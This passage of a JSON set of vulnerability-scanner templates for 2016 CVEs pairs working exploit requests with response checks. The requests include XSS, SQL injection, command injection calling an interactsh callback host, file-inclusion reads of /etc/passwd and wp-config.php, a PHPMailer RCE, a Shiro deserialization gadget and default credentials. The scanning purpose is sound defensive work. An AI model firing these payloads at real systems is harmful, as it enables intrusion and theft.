Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/visualrf/group_list.xml?aps=1&start=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&end=500&match"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1555","info":{"name":"NETGEAR WNAP320 Access Point Firmware - Remote Command Injection","severity":"critical"},"requests":[{"raw":["POST /boardDataWW.php HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nmacAddress=112233445566%3Bwget+http%3A%2F%2F{{interactsh-url}}%23&reginfo=0&writeData=Submit\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2016-1000140","info":{"name":"WordPress New Year Firework <=1.1.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/new-year-firework/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["New Year Firework ="]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/new-year-firework/firework/index.php?text=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-10940","info":{"name":"WordPress zm-gallery plugin 1.0 SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=zm_gallery&orderby=(SELECT%20(CASE%20WHEN%20(7422=7422)%20THEN%200x6e616d65%20ELSE%20(SELECT%203211%20UNION%20SELECT%208682)%20END))&order=desc HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-admin/admin.php?page=zm_gallery&orderby=(SELECT%20(CASE%20WHEN%20(7422=7421)%20THEN%200x6e616d65%20ELSE%20(SELECT%203211%20UNION%20SELECT%208682)%20END))&order=desc HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_1 == 302 && status_code_2 == 200 && status_code_3 == 200","contains(body_2, \"[zm_gallery id=\")","contains(body_2, \"<th scope=\\\"row\\\" class=\\\"check-column\\\">\")","!contains(body_3, \"<th scope=\\\"row\\\" class=\\\"check-column\\\">\")"],"condition":"and"}]}]},{"id":"CVE-2016-5649","info":{"name":"NETGEAR DGN2200 / DGND3700 - Admin Password Disclosure","severity":"critical"},"requests":[{"raw":["GET /BSW_cxttongr.htm HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>Smart Wizard Result</title> "]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"password","group":1,"regex":["<b>Success \"([a-z]+)\""],"part":"body"}]}]},{"id":"CVE-2016-7981","info":{"name":"SPIP <3.1.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ecrire/?exec=valider_xml&var_url=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-5674","info":{"name":"NUUO NVR camera `debugging_center_utils_.php` - Command Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/__debugging_center_utils___.php?log=;echo%20{{rand}}%20|%20id","{{BaseURL}}/__debugging_center_utils___.php?log=;echo%20{{rand}}%20|%20ipconfig"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"dsl","dsl":["status_code_1 == 200","contains(body_1, 'Debugging Center')","regex('uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)', body_1)"],"condition":"and"},{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, 'Debugging Center')","contains(body_2, 'Windows IP')"],"condition":"and"}]}]},{"id":"CVE-2016-1000149","info":{"name":"WordPress Simpel Reserveren <=3.5.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/simpel-reserveren/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Simpel Reserveren","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/simpel-reserveren/edit.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-10134","info":{"name":"Zabbix - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0)::"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Error in query [INSERT INTO profiles (profileid, userid","You have an error in your SQL syntax"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000127","info":{"name":"WordPress AJAX Random Post <=2.00 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/ajax-random-post/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Ajax Random Post"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/ajax-random-post/js.php?interval=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-10368","info":{"name":"Opsview Monitor Pro - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlogin_username={{username}}&login_password={{password}}&login=&back=//www.interact.sh&app=OPSVIEW\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2016-1000153","info":{"name":"WordPress Tidio Gallery <=1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/tidio-gallery/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Tidio Gallery","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/tidio-gallery/popup-insert-help.php?galleryId=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-10973","info":{"name":"Brafton WordPress Plugin < 3.4.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=BraftonArticleLoader&tab=alert%28document.domain%29 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"tab = alert(document.domain);\")","contains(body_2, \"Brafton Article Loader\")"],"condition":"and"}]}]},{"id":"CVE-2016-1000128","info":{"name":"WordPress anti-plagiarism <=3.60 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/anti-plagiarism/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["anti plagiarism","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/anti-plagiarism/js.php?m=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000137","info":{"name":"WordPress Hero Maps Pro 2.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/hero-maps-pro/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Hero Maps Pro ="]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/hero-maps-pro/views/dashboard/index.php?v=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-10993","info":{"name":"ScoreMe Theme - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["/wp-content/themes/scoreme/style"]}]},{"method":"GET","path":["{{BaseURL}}/?s=%22%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-10960","info":{"name":"WordPress wSecure Lite < 2.4 - Remote Code Execution","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-content/plugins/wsecure/wsecure-config.php"],"body":"wsecure_action=update&publish=\";} header(\"{{name}}: CVE-2016-10960\"); class WSecureConfig2 {var $test=\"","matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["{{name}}: CVE-2016-10960"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-10976","info":{"name":"Safe Editor Plugin < 1.2 - CSS/JS-injection","severity":"medium"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\naction=se_save&type=js&data=alert(document.domain)\n"],"matchers":[{"type":"dsl","dsl":["len(body) == 0","status_code == 200","contains(content_type, \"text/html\")"],"condition":"and","internal":true}]},{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains_all(body, \"alert(document.domain)\", \"save_edit_js\")"],"condition":"and"}]}]},{"id":"CVE-2016-6195","info":{"name":"vBulletin <= 4.2.3 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27","{{BaseURL}}/boards/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27","{{BaseURL}}/board/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27","{{BaseURL}}/forum/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27","{{BaseURL}}/forums/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27","{{BaseURL}}/vb/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27"],"stop-at-first-match":true,"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["type=dberror"]},{"type":"status","status":[200,503],"condition":"or"}]}]},{"id":"CVE-2016-10367","info":{"name":"Opsview Monitor Pro - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/monitoring/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2016-10033","info":{"name":"WordPress PHPMailer < 5.2.18 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /?author=1 HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\n\n","POST /wp-login.php?action=lostpassword HTTP/1.1\nHost: target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}success}} null)\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nwp-submit=Get+New+Password&redirect_to=&user_login={{username}}\n\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["wp-login.php?checkemail=confirm"]},{"type":"status","status":[302]}],"extractors":[{"type":"regex","name":"username","group":1,"regex":["Author:(?:[A-Za-z0-9 -\\_=\"]+)?<span(?:[A-Za-z0-9 -\\_=\"]+)?>([A-Za-z0-9]+)<\\/span>"],"internal":true,"part":"body"}]}]},{"id":"CVE-2016-1000126","info":{"name":"WordPress Admin Font Editor <=1.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/admin-font-editor/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Admin Font Editor"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/admin-font-editor/css.php?size=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-3978","info":{"name":"Fortinet FortiOS  - Open Redirect/Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/login?redir=http://www.interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2016-1000134","info":{"name":"WordPress HDW Video Gallery <=1.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/hdw-tube/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["HDW WordPress Video Gallery"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/hdw-tube/playlist.php?playlist=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000129","info":{"name":"WordPress defa-online-image-protector <=3.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/defa-online-image-protector/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Defa Online Image Protector"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/defa-online-image-protector/redirect.php?r=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-4437","info":{"name":"Apache Shiro 1.2.4 Cookie RememberME - Deserial Remote Code Execution Vulnerability","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: rememberMe={{base64(concat(base64_decode(\"QUVTL0NCQy9QS0NTNVBhZA==\"),aes_cbc(base64_decode(generate_java_gadget(\"dns\", \"http://{{interactsh-url}}\", \"base64\")), base64_decode(\"kPH+bIxk5D2deZiIxcaaaA==\"), base64_decode(\"QUVTL0NCQy9QS0NTNVBhZA==\"))))}}\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]}]}]},{"id":"CVE-2016-1000138","info":{"name":"WordPress Admin Font Editor <=1.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/indexisto/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["= Indexisto"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/indexisto/assets/js/indexisto-inject.php?indexisto_index=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-10108","info":{"name":"Western Digital MyCloud NAS - Command Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nCookie: isAdmin=1; username=admin|echo%20`ping -c 3 {{interactsh-url}}`; local_login=1\n"],"matchers":[{"type":"dsl","dsl":["contains(body, \"WDMyCloud\")","contains(interactsh_protocol, \"dns\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2016-1000142","info":{"name":"WordPress MW Font Changer <=4.2.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/parsi-font/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["WP-Parsi Admin Font Editor","MW Font Changer"],"condition":"or"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/parsi-font/css.php?size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000132","info":{"name":"WordPress enhanced-tooltipglossary 3.2.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/enhanced-tooltipglossary/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["CM Tooltip Glossary"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/enhanced-tooltipglossary/backend/views/admin_importexport.php?itemsnumber=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&msg=imported"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-6277","info":{"name":"NETGEAR Routers - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/;cat$IFS/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-4977","info":{"name":"Spring Security OAuth2 Remote Command Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/oauth/authorize?response_type=${13337*73331}&client_id=acme&scope=openid&redirect_uri=http://test"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Unsupported response types: [978015547]"]},{"type":"status","status":[400]}]}]},{"id":"CVE-2016-1000148","info":{"name":"WordPress S3 Video <=0.983 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/s3-video/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["S3 Video Plugin ="]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/s3-video/views/video-management/preview_video.php?media=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3C%22"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script><\""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000135","info":{"name":"WordPress HDW Video Gallery <=1.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/hdw-tube/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["HDW WordPress Video Gallery"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/hdw-tube/mychannel.php?channel=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-7834","info":{"name":"Sony IPELA Engine IP Camera - Hardcoded Account","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/command/prima-factory.cgi"],"headers":{"Authorization":"Bearer cHJpbWFuYTpwcmltYW5h"},"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["gen5th","gen6th"],"condition":"or"},{"type":"status","status":[204]}]}]},{"id":"CVE-2016-10924","info":{"name":"Wordpress Zedna eBook download <1.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000131","info":{"name":"WordPress e-search <=1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/e-search/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Search","Tags:","Tested up to:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/e-search/tmpl/title_az.php?title_az=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-2389","info":{"name":"SAP xMII 15.0 for SAP NetWeaver 7.4 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/XMII/Catalog?Mode=GetFileList&Path=Classes/../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000133","info":{"name":"WordPress forget-about-shortcode-buttons 1.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/forget-about-shortcode-buttons/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Forget About Shortcode Buttons ="]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php?source=1&ver=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-4975","info":{"name":"Apache mod_userdir CRLF injection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/~user/%0D%0ASet-Cookie:crlfinjection"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Set-Cookie\\s*?:(?:\\s*?|.*?;\\s*?))(crlfinjection=crlfinjection)(?:\\s*?)(?:$|;)"]}]}]},{"id":"CVE-2016-1000143","info":{"name":"WordPress Photoxhibit 2.1.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/photoxhibit/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["PhotoXhibit","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/photoxhibit/common/inc/pages/build.php?gid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000152","info":{"name":"WordPress Tidio-form <=1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/tidio-form/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Easy Contact Form Builder ="]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/tidio-form/popup-insert-help.php?formId=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-6601","info":{"name":"ZOHO WebNMS Framework <5.2 SP1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/servlets/FetchFile?fileName=../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-0957","info":{"name":"Adobe AEM Dispatcher <4.15 - Rules Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/system/console?.css"],"headers":{"Authorization":"Basic YWRtaW46YWRtaW4K"},"matchers-condition":"and","matchers":[{"type":"word","words":["Adobe","java.lang","(Runtime)"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000136","info":{"name":"WordPress heat-trackr 1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"word","internal":true,"words":["/wp-content/plugins/heat-trackr/"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/heat-trackr/heat-trackr_abtest_add.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-3088","info":{"name":"Apache ActiveMQ Fileserver - Arbitrary File Write","severity":"critical"},"requests":[{"raw":["PUT /fileserver/{{randstr}}.txt HTTP/1.1\nHost: {{Hostname}}\n\n{{rand1}}\n","GET /fileserver/{{randstr}}.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_1==204","status_code_2==200","contains((body_2), '{{rand1}}')"],"condition":"and"}]}]},{"id":"CVE-2016-1000139","info":{"name":"WordPress Infusionsoft Gravity Forms <=1.5.11 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/infusionsoft/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Infusionsoft","Tags:"],"condition":"and","case-insensitive":true}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/infusionsoft/Infusionsoft/examples/leadscoring.php?ContactId=%22%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E%3C%22"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain);</script><\"","input type=\"text\" name=\"ContactId\""],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000154","info":{"name":"WordPress WHIZZ <=1.0.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/whizz/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["WHIZZ","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/whizz/plugins/delete-plugin.php?plugin=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000155","info":{"name":"WordPress WPSOLR <=8.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/wpsolr-search-engine/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["WPSOLR Search Engine 